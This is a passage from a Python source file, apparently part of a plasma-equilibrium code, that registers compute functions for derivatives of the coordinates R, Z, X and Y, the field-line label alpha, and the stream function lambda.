description="Major radius in lab frame, third derivative, wrt radius twice "
"and toroidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrz(params, transforms, profiles, data, **kwargs):
data["R_rrz"] = transforms["R"].transform(params["R_lmn"], 2, 0, 1)
return data
@register_compute_fun(
name="R_rrzz",
label="\\partial_{\\rho \\rho \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative, wrt radius twice "
"and toroidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrzz(params, transforms, profiles, data, **kwargs):
data["R_rrzz"] = transforms["R"].transform(params["R_lmn"], 2, 0, 2)
return data
@register_compute_fun(
name="R_rt",
label="\\partial_{\\rho \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second derivative wrt radius "
"and poloidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rt(params, transforms, profiles, data, **kwargs):
data["R_rt"] = transforms["R"].transform(params["R_lmn"], 1, 1, 0)
return data
@register_compute_fun(
name="R_rtt",
label="\\partial_{\\rho \\theta \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative wrt radius and "
"poloidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rtt(params, transforms, profiles, data, **kwargs):
data["R_rtt"] = transforms["R"].transform(params["R_lmn"], 1, 2, 0)
return data
@register_compute_fun(
name="R_rttt",
label="\\partial_{\\rho \\theta \\theta \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt radius and "
"poloidal angle thrice",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rttt(params, transforms, profiles, data, **kwargs):
data["R_rttt"] = transforms["R"].transform(params["R_lmn"], 1, 3, 0)
return data
@register_compute_fun(
name="R_rttz",
label="\\partial_{\\rho \\theta \\theta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt radius once, "
"poloidal angle twice, and toroidal angle once",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rttz(params, transforms, profiles, data, **kwargs):
data["R_rttz"] = transforms["R"].transform(params["R_lmn"], 1, 2, 1)
return data
@register_compute_fun(
name="R_rtz",
label="\\partial_{\\rho \\theta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative wrt radius, poloidal "
"angle, and toroidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rtz(params, transforms, profiles, data, **kwargs):
data["R_rtz"] = transforms["R"].transform(params["R_lmn"], 1, 1, 1)
return data
@register_compute_fun(
name="R_rtzz",
label="\\partial_{\\rho \\theta \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt radius, poloidal "
"angle, and toroidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rtzz(params, transforms, profiles, data, **kwargs):
data["R_rtzz"] = transforms["R"].transform(params["R_lmn"], 1, 1, 2)
return data
@register_compute_fun(
name="R_rz",
label="\\partial_{\\rho \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second derivative wrt radius "
"and toroidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rz(params, transforms, profiles, data, **kwargs):
data["R_rz"] = transforms["R"].transform(params["R_lmn"], 1, 0, 1)
return data
@register_compute_fun(
name="R_rzz",
label="\\partial_{\\rho \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative wrt radius and "
"toroidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rzz(params, transforms, profiles, data, **kwargs):
data["R_rzz"] = transforms["R"].transform(params["R_lmn"], 1, 0, 2)
return data
@register_compute_fun(
name="R_rzzz",
label="\\partial_{\\rho \\zeta \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt radius and "
"toroidal angle thrice",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rzzz(params, transforms, profiles, data, **kwargs):
data["R_rzzz"] = transforms["R"].transform(params["R_lmn"], 1, 0, 3)
return data
@register_compute_fun(
name="R_t",
label="\\partial_{\\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, first poloidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_t(params, transforms, profiles, data, **kwargs):
data["R_t"] = transforms["R"].transform(params["R_lmn"], 0, 1, 0)
return data
@register_compute_fun(
name="R_tt",
label="\\partial_{\\theta \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second poloidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_tt(params, transforms, profiles, data, **kwargs):
data["R_tt"] = transforms["R"].transform(params["R_lmn"], 0, 2, 0)
return data
@register_compute_fun(
name="R_ttt",
label="\\partial_{\\theta \\theta \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third poloidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_ttt(params, transforms, profiles, data, **kwargs):
data["R_ttt"] = transforms["R"].transform(params["R_lmn"], 0, 3, 0)
return data
@register_compute_fun(
name="R_ttz",
label="\\partial_{\\theta \\theta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative wrt poloidal angle "
"twice and toroidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_ttz(params, transforms, profiles, data, **kwargs):
data["R_ttz"] = transforms["R"].transform(params["R_lmn"], 0, 2, 1)
return data
@register_compute_fun(
name="R_tz",
label="\\partial_{\\theta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second derivative wrt poloidal "
"and toroidal angles",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_tz(params, transforms, profiles, data, **kwargs):
data["R_tz"] = transforms["R"].transform(params["R_lmn"], 0, 1, 1)
return data
@register_compute_fun(
name="R_tzz",
label="\\partial_{\\theta \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative wrt poloidal angle "
"and toroidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_tzz(params, transforms, profiles, data, **kwargs):
data["R_tzz"] = transforms["R"].transform(params["R_lmn"], 0, 1, 2)
return data
@register_compute_fun(
name="R_z",
label="\\partial_{\\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, first toroidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_z(params, transforms, profiles, data, **kwargs):
data["R_z"] = transforms["R"].transform(params["R_lmn"], 0, 0, 1)
return data
@register_compute_fun(
name="R_zz",
label="\\partial_{\\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second toroidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_zz(params, transforms, profiles, data, **kwargs):
data["R_zz"] = transforms["R"].transform(params["R_lmn"], 0, 0, 2)
return data
@register_compute_fun(
name="R_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third toroidal derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_zzz(params, transforms, profiles, data, **kwargs):
data["R_zzz"] = transforms["R"].transform(params["R_lmn"], 0, 0, 3)
return data
@register_compute_fun(
name="X",
label="X = R \\cos{\\phi}",
units="m",
units_long="meters",
description="Cartesian X coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "phi"],
)
def _X(params, transforms, profiles, data, **kwargs):
data["X"] = data["R"] * jnp.cos(data["phi"])
return data
@register_compute_fun(
name="X_r",
label="\\partial_{\\rho} X",
units="m",
units_long="meters",
description="Cartesian X coordinate, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_r", "phi", "phi_r"],
)
def _X_r(params, transforms, profiles, data, **kwargs):
data["X_r"] = (
data["R_r"] * jnp.cos(data["phi"])
- data["R"] * jnp.sin(data["phi"]) * data["phi_r"]
)
return data
@register_compute_fun(
name="X_t",
label="\\partial_{\\theta} X",
units="m",
units_long="meters",
description="Cartesian X coordinate, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_t", "phi", "phi_t"],
)
def _X_t(params, transforms, profiles, data, **kwargs):
data["X_t"] = (
data["R_t"] * jnp.cos(data["phi"])
- data["R"] * jnp.sin(data["phi"]) * data["phi_t"]
)
return data
@register_compute_fun(
name="X_z",
label="\\partial_{\\zeta} X",
units="m",
units_long="meters",
description="Cartesian X coordinate, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_z", "phi", "phi_z"],
)
def _X_z(params, transforms, profiles, data, **kwargs):
data["X_z"] = (
data["R_z"] * jnp.cos(data["phi"])
- data["R"] * jnp.sin(data["phi"]) * data["phi_z"]
)
return data
@register_compute_fun(
name="Y",
label="Y = R \\sin{\\phi}",
units="m",
units_long="meters",
description="Cartesian Y coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "phi"],
)
def _Y(params, transforms, profiles, data, **kwargs):
data["Y"] = data["R"] * jnp.sin(data["phi"])
return data
@register_compute_fun(
name="Y_r",
label="\\partial_{\\rho} Y",
units="m",
units_long="meters",
description="Cartesian Y coordinate, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_r", "phi", "phi_r"],
)
def _Y_r(params, transforms, profiles, data, **kwargs):
data["Y_r"] = (
data["R_r"] * jnp.sin(data["phi"])
+ data["R"] * jnp.cos(data["phi"]) * data["phi_r"]
)
return data
@register_compute_fun(
name="Y_t",
label="\\partial_{\\theta} Y",
units="m",
units_long="meters",
description="Cartesian Y coordinate, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_t", "phi", "phi_t"],
)
def _Y_t(params, transforms, profiles, data, **kwargs):
data["Y_t"] = (
data["R_t"] * jnp.sin(data["phi"])
+ data["R"] * jnp.cos(data["phi"]) * data["phi_t"]
)
return data
@register_compute_fun(
name="Y_z",
label="\\partial_{\\zeta} Y",
units="m",
units_long="meters",
description="Cartesian Y coordinate, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["R", "R_z", "phi", "phi_z"],
)
def _Y_z(params, transforms, profiles, data, **kwargs):
data["Y_z"] = (
data["R_z"] * jnp.sin(data["phi"])
+ data["R"] * jnp.cos(data["phi"]) * data["phi_z"]
)
return data
@register_compute_fun(
name="Z",
label="Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z(params, transforms, profiles, data, **kwargs):
data["Z"] = transforms["Z"].transform(params["Z_lmn"], 0, 0, 0)
return data
@register_compute_fun(
name="Z_r",
label="\\partial_{\\rho} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, first radial derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_r(params, transforms, profiles, data, **kwargs):
data["Z_r"] = transforms["Z"].transform(params["Z_lmn"], 1, 0, 0)
return data
@register_compute_fun(
name="Z_rr",
label="\\partial_{\\rho \\rho} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second radial derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rr(params, transforms, profiles, data, **kwargs):
data["Z_rr"] = transforms["Z"].transform(params["Z_lmn"], 2, 0, 0)
return data
@register_compute_fun(
name="Z_rrr",
label="\\partial_{\rho \\rho \\rho} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third radial derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[3, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrr(params, transforms, profiles, data, **kwargs):
data["Z_rrr"] = transforms["Z"].transform(params["Z_lmn"], 3, 0, 0)
return data
@register_compute_fun(
name="Z_rrrr",
label="\\partial_{\rho \\rho \\rho \\rho} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth radial derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[4, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrrr(params, transforms, profiles, data, **kwargs):
data["Z_rrrr"] = transforms["Z"].transform(params["Z_lmn"], 4, 0, 0)
return data
@register_compute_fun(
name="Z_rrrt",
label="\\partial_{\rho \\rho \\rho \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative wrt "
" radial coordinate thrice and poloidal once",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[3, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrrt(params, transforms, profiles, data, **kwargs):
data["Z_rrrt"] = transforms["Z"].transform(params["Z_lmn"], 3, 1, 0)
return data
@register_compute_fun(
name="Z_rrrz",
label="\\partial_{\rho \\rho \\rho \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative wrt "
" radial coordinate thrice and toroidal once",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[3, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrrz(params, transforms, profiles, data, **kwargs):
data["Z_rrrz"] = transforms["Z"].transform(params["Z_lmn"], 3, 0, 1)
return data
@register_compute_fun(
name="Z_rrt",
label="\\partial_{\\rho \\rho \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative, wrt radius "
"twice and poloidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrt(params, transforms, profiles, data, **kwargs):
data["Z_rrt"] = transforms["Z"].transform(params["Z_lmn"], 2, 1, 0)
return data
@register_compute_fun(
name="Z_rrtt",
label="\\partial_{\\rho \\rho \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative, wrt radius "
"twice and poloidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrtt(params, transforms, profiles, data, **kwargs):
data["Z_rrtt"] = transforms["Z"].transform(params["Z_lmn"], 2, 2, 0)
return data
@register_compute_fun(
name="Z_rrtz",
label="\\partial_{\\rho \\rho \\theta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative wrt radius"
"twice, poloidal angle, and toroidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrtz(params, transforms, profiles, data, **kwargs):
data["Z_rrtz"] = transforms["Z"].transform(params["Z_lmn"], 2, 1, 1)
return data
@register_compute_fun(
name="Z_rrz",
label="\\partial_{\\rho \\rho \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative, wrt radius "
"twice and toroidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrz(params, transforms, profiles, data, **kwargs):
data["Z_rrz"] = transforms["Z"].transform(params["Z_lmn"], 2, 0, 1)
return data
@register_compute_fun(
name="Z_rrzz",
label="\\partial_{\\rho \\rho \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative, wrt radius "
"twice and toroidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[2, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rrzz(params, transforms, profiles, data, **kwargs):
data["Z_rrzz"] = transforms["Z"].transform(params["Z_lmn"], 2, 0, 2)
return data
@register_compute_fun(
name="Z_rt",
label="\\partial_{\\rho \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second derivative wrt radius "
"and poloidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rt(params, transforms, profiles, data, **kwargs):
data["Z_rt"] = transforms["Z"].transform(params["Z_lmn"], 1, 1, 0)
return data
@register_compute_fun(
name="Z_rtt",
label="\\partial_{\\rho \\theta \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt radius "
"and poloidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rtt(params, transforms, profiles, data, **kwargs):
data["Z_rtt"] = transforms["Z"].transform(params["Z_lmn"], 1, 2, 0)
return data
@register_compute_fun(
name="Z_rttt",
label="\\partial_{\\rho \\theta \\theta \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt radius "
"and poloidal angle thrice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rttt(params, transforms, profiles, data, **kwargs):
data["Z_rttt"] = transforms["Z"].transform(params["Z_lmn"], 1, 3, 0)
return data
@register_compute_fun(
name="Z_rttz",
label="\\partial_{\\rho \\theta \\theta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative wrt radius "
"once, poloidal angle twice, and toroidal angle once",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rttz(params, transforms, profiles, data, **kwargs):
data["Z_rttz"] = transforms["Z"].transform(params["Z_lmn"], 1, 2, 1)
return data
@register_compute_fun(
name="Z_rtz",
label="\\partial_{\\rho \\theta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt radius, "
"poloidal angle, and toroidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rtz(params, transforms, profiles, data, **kwargs):
data["Z_rtz"] = transforms["Z"].transform(params["Z_lmn"], 1, 1, 1)
return data
@register_compute_fun(
name="Z_rtzz",
label="\\partial_{\\rho \\theta \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, fourth derivative wrt radius, "
"poloidal angle, and toroidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rtzz(params, transforms, profiles, data, **kwargs):
data["Z_rtzz"] = transforms["Z"].transform(params["Z_lmn"], 1, 1, 2)
return data
@register_compute_fun(
name="Z_rz",
label="\\partial_{\\rho \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second derivative wrt radius "
"and toroidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rz(params, transforms, profiles, data, **kwargs):
data["Z_rz"] = transforms["Z"].transform(params["Z_lmn"], 1, 0, 1)
return data
@register_compute_fun(
name="Z_rzz",
label="\\partial_{\\rho \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt radius "
"and toroidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rzz(params, transforms, profiles, data, **kwargs):
data["Z_rzz"] = transforms["Z"].transform(params["Z_lmn"], 1, 0, 2)
return data
@register_compute_fun(
name="Z_rzzz",
label="\\partial_{\\rho \\zeta \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt radius "
"and toroidal angle thrice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[1, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_rzzz(params, transforms, profiles, data, **kwargs):
data["Z_rzzz"] = transforms["Z"].transform(params["Z_lmn"], 1, 0, 3)
return data
@register_compute_fun(
name="Z_t",
label="\\partial_{\\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, first poloidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_t(params, transforms, profiles, data, **kwargs):
data["Z_t"] = transforms["Z"].transform(params["Z_lmn"], 0, 1, 0)
return data
@register_compute_fun(
name="Z_tt",
label="\\partial_{\\theta \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second poloidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_tt(params, transforms, profiles, data, **kwargs):
data["Z_tt"] = transforms["Z"].transform(params["Z_lmn"], 0, 2, 0)
return data
@register_compute_fun(
name="Z_ttt",
label="\\partial_{\\theta \\theta \\theta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third poloidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 3, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_ttt(params, transforms, profiles, data, **kwargs):
data["Z_ttt"] = transforms["Z"].transform(params["Z_lmn"], 0, 3, 0)
return data
@register_compute_fun(
name="Z_ttz",
label="\\partial_{\\theta \\theta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt poloidal "
"angle twice and toroidal angle",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 2, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_ttz(params, transforms, profiles, data, **kwargs):
data["Z_ttz"] = transforms["Z"].transform(params["Z_lmn"], 0, 2, 1)
return data
@register_compute_fun(
name="Z_tz",
label="\\partial_{\\theta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second derivative wrt poloidal "
"and toroidal angles",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_tz(params, transforms, profiles, data, **kwargs):
data["Z_tz"] = transforms["Z"].transform(params["Z_lmn"], 0, 1, 1)
return data
@register_compute_fun(
name="Z_tzz",
label="\\partial_{\\theta \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third derivative wrt poloidal "
"angle and toroidal angle twice",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 1, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_tzz(params, transforms, profiles, data, **kwargs):
data["Z_tzz"] = transforms["Z"].transform(params["Z_lmn"], 0, 1, 2)
return data
@register_compute_fun(
name="Z_z",
label="\\partial_{\\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, first toroidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_z(params, transforms, profiles, data, **kwargs):
data["Z_z"] = transforms["Z"].transform(params["Z_lmn"], 0, 0, 1)
return data
@register_compute_fun(
name="Z_zz",
label="\\partial_{\\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, second toroidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 0, 2]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_zz(params, transforms, profiles, data, **kwargs):
data["Z_zz"] = transforms["Z"].transform(params["Z_lmn"], 0, 0, 2)
return data
@register_compute_fun(
name="Z_zzz",
label="\\partial_{\\zeta \\zeta \\zeta} Z",
units="m",
units_long="meters",
description="Vertical coordinate in lab frame, third toroidal derivative",
dim=1,
params=["Z_lmn"],
transforms={"Z": [[0, 0, 3]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _Z_zzz(params, transforms, profiles, data, **kwargs):
data["Z_zzz"] = transforms["Z"].transform(params["Z_lmn"], 0, 0, 3)
return data
@register_compute_fun(
name="alpha",
label="\\alpha",
units="~",
units_long="None",
description="Field line label, defined on [0, 2pi)",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["theta_PEST", "zeta", "iota"],
)
def _alpha(params, transforms, profiles, data, **kwargs):
data["alpha"] = (data["theta_PEST"] - data["iota"] * data["zeta"]) % (2 * jnp.pi)
return data
@register_compute_fun(
name="alpha_r",
label="\\partial_\\rho \\alpha",
units="~",
units_long="None",
description="Field line label, derivative wrt radial coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["theta_PEST_r", "phi", "phi_r", "iota", "iota_r"],
)
def _alpha_r(params, transforms, profiles, data, **kwargs):
data["alpha_r"] = (
data["theta_PEST_r"]
- data["iota_r"] * data["phi"]
- data["iota"] * data["phi_r"]
)
return data
@register_compute_fun(
name="alpha_t",
label="\\partial_\\theta \\alpha",
units="~",
units_long="None",
description="Field line label, derivative wrt poloidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["theta_PEST_t", "phi_t", "iota"],
)
def _alpha_t(params, transforms, profiles, data, **kwargs):
data["alpha_t"] = data["theta_PEST_t"] + data["iota"] * data["phi_t"]
return data
@register_compute_fun(
name="alpha_z",
label="\\partial_\\zeta \\alpha",
units="~",
units_long="None",
description="Field line label, derivative wrt toroidal coordinate",
dim=1,
params=[],
transforms={},
profiles=[],
coordinates="rtz",
data=["theta_PEST_z", "phi_z", "iota"],
)
def _alpha_z(params, transforms, profiles, data, **kwargs):
data["alpha_z"] = data["theta_PEST_z"] - data["iota"] * data["phi_z"]
return data
@register_compute_fun(
name="lambda",
label="\\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function",
dim=1,
params=["L_lmn"],
transforms={"L": [[0, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda(params, transforms, profiles, data, **kwargs):
data["lambda"] = transforms["L"].transform(params["L_lmn"], 0, 0, 0)
return data
@register_compute_fun(
name="lambda_r",
label="\\partial_{\\rho} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, first radial derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[1, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_r(params, transforms, profiles, data, **kwargs):
data["lambda_r"] = transforms["L"].transform(params["L_lmn"], 1, 0, 0)
return data
@register_compute_fun(
name="lambda_rr",
label="\\partial_{\\rho \\rho} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, second radial derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[2, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rr(params, transforms, profiles, data, **kwargs):
data["lambda_rr"] = transforms["L"].transform(params["L_lmn"], 2, 0, 0)
return data
@register_compute_fun(
name="lambda_rrr",
label="\\partial_{\rho \\rho \\rho} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third radial derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[3, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrr(params, transforms, profiles, data, **kwargs):
data["lambda_rrr"] = transforms["L"].transform(params["L_lmn"], 3, 0, 0)
return data
@register_compute_fun(
name="lambda_rrrt",
label="\\partial_{\rho \\rho \\rho \\theta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third radial derivative and"
" first poloidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[3, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrrt(params, transforms, profiles, data, **kwargs):
data["lambda_rrrt"] = transforms["L"].transform(params["L_lmn"], 3, 1, 0)
return data
@register_compute_fun(
name="lambda_rrrz",
label="\\partial_{\rho \\rho \\rho \\zeta} \\lambda",
units="rad",
units_long="radians",
description="Poloidal stream function, third radial derivative and"
" first toroidal derivative",
dim=1,
params=["L_lmn"],
transforms={"L": [[3, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _lambda_rrrz(params, transforms, profiles, data, **kwargs):
data["lambda_rrrz"] = transforms["L"].transform(params["L_lmn"], 3, 0, 1)
return data
@register_compute_fun(
name="lambda_rrt",
